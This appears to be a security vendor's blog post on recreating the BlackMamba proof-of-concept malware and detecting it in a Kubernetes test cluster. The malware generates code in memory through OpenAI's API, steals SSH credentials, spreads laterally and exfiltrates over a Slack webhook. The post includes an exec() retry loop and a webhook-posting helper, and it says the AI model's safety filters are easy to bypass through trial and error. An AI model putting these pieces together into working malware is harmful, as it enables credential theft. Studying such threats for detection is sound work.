The world of cybersecurity is no stranger to new and dangerous threats, and a recently published proof-of-concept malware is causing quite a stir. BlackMamba, coined by Hyas in their blog post, is a fascinating application of language models such as OpenAI’s ChatGPT. It poses as a rather simple Python program that flies under the radar of typical security software. When executed, however, it reaches out to OpenAI’s API to receive malicious code and runs it on the fly. The malicious code exists only in the memory of the victim machine and is different every time the program runs.
In their blog post, Hyas created a BlackMamba keylogger that generates its keylogging code in memory and exfiltrates the captured keystrokes over a trusted communication channel such as Microsoft Teams. This inspired us at Spyderbat to take our own stab at creating a version of BlackMamba. In our example, we wrote a program that attempts to steal SSH credentials and exfiltrate them via a Slack webhook. Not only that, it also tries to move laterally across the network to steal credentials from other machines.
To see what this looks like in Spyderbat’s UI, follow this link.
The full breakdown of the code can be found in Hyas’ whitepaper. The concept is to wrap simple functionality around a Code Synthesis function:
- Step 1: Create a loop that includes a call to the Code Synthesis function
- Step 2: Generate and attempt to execute the code
- Step 3: If unsuccessful, go back to Step 2. If successful, exfiltrate the data and clean up.
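The steps above can be sketched as a small retry loop. This is an illustration only, not the PoC’s actual code: `ask_model` is a hypothetical stand-in for the OpenAI API call, and no malicious prompt or payload is reproduced here.

```python
def synthesize_and_run(prompt: str, ask_model, max_attempts: int = 5) -> dict:
    """Request code from the model, exec() it in memory, and retry on bugs."""
    for _ in range(max_attempts):
        code = ask_model(prompt)       # Step 1: code synthesis via the API
        scope: dict = {}
        try:
            exec(code, scope)          # Step 2: run it -- nothing touches disk
            return scope               # success: caller exfiltrates and cleans up
        except Exception:
            continue                   # Step 3: buggy generation, ask again
    raise RuntimeError(f"no working code after {max_attempts} attempts")
```

Because each generation lives only in the `scope` dictionary, nothing is ever written to disk, which is what makes this pattern hard for file-based scanners to catch.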
Code Synthesis involves setting up your program with access to the OpenAI API and crafting a prompt that returns the code you need.
Crafting the prompt can be tricky. OpenAI has numerous filters to prevent you from using their tool for malicious purposes, but with enough trial and error it becomes easy enough to bypass them, and someone with malicious intent is certainly able to dedicate the time to do that. The engine will also sometimes return code with bugs, so the program must be resilient to that. Again, you can be more explicit in your prompt and eventually reach a point where bugs show up infrequently. Once the code was generated, we used Python’s exec() function to run it on the fly.
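One practical wrinkle worth noting: chat models often wrap returned code in a markdown fence, which would break exec() if passed through verbatim. A small helper like the following can strip that formatting first (this is our own assumption about the reply format, not code from the PoC):

```python
import re

def extract_code(reply: str) -> str:
    """Strip a markdown code fence from a model reply, if one is present."""
    match = re.search(r"```(?:python)?\s*\n(.*?)```", reply, re.DOTALL)
    return match.group(1) if match else reply
```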
We chose Slack webhooks as the way to exfiltrate the data. The generated code saves all of the SSH credentials to a string variable and then sends it out to our Slack channel via a small helper function.
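A minimal sketch of such a helper, using only Python’s standard library (the function names and the split into a payload builder are our own illustration, not the PoC’s exact code; the webhook URL is supplied by the caller):

```python
import json
import urllib.request

def build_payload(text: str) -> bytes:
    """Slack incoming webhooks expect a JSON body with a "text" field."""
    return json.dumps({"text": text}).encode("utf-8")

def post_to_slack(webhook_url: str, text: str) -> int:
    """POST the collected string to a Slack incoming webhook; returns HTTP status."""
    req = urllib.request.Request(
        webhook_url,
        data=build_payload(text),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status
```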
Ultimately, the Python program can be built into an executable using a tool such as auto-py-to-exe and executed anywhere. Note: when compiling with auto-py-to-exe or pyinstaller, you are building an executable for the OS you are currently using.
Test Environment & Analysis
With a working version of BlackMamba, we set off to understand what malware like this looks like in Spyderbat. We wanted to see how it would appear in a compromised Kubernetes cluster, so we built out a multi-pod development namespace hosting containers that developers could connect to for testing and building code. This is what our cluster looks like in the Spyderbat k8s view.
We also built out a policy of “normal” activity using Spyderbat’s automatic Fingerprint feature. Every container that is created on a node running Spyderbat will generate a fingerprint that contains a process tree and both ingress and egress connections.
Fingerprints can be turned into enforceable Policies via the Spyctl tool, which will then notify you when a container’s activity violates the Policy and take any other supported actions. In this case, we opted not to block any activity so that it would be viewable in an investigation. The next step was logging into one of the containers and executing our BlackMamba. It immediately showed up in one of our Dashboard cards.
Since we already had a Policy in place for the development container and a Dashboard monitoring for violations of that policy, we were immediately notified that something was amiss and were provided with a link to view the trace in a Spyderbat Investigation.
After following the chain of events we were presented with this view of what happened. We connected in via SSH from an AWS Load Balancer and were given an interactive bash shell. From there, we executed the BlackMamba executable to analyze its behavior. As expected, the malware connected to api.openai.com and generated new code in memory. Upon execution of the code, it extracted SSH credentials and identified a configuration file that enabled it to move laterally to another dev container on the same node. Finally, it exfiltrated the data via the Slack webhook. Sure enough, the Slack channel had the contents of all of the files in the .ssh directory for both containers.
While this is only a proof of concept, it was surprisingly easy to use the OpenAI API to generate dubious code in memory and then execute it. This is only the beginning for this type of malware, and it is not far-fetched to assume that malicious actors will attempt to use similar methods in the future. Having a tool that can detect and block zero-day threats will only become more necessary in the years to come.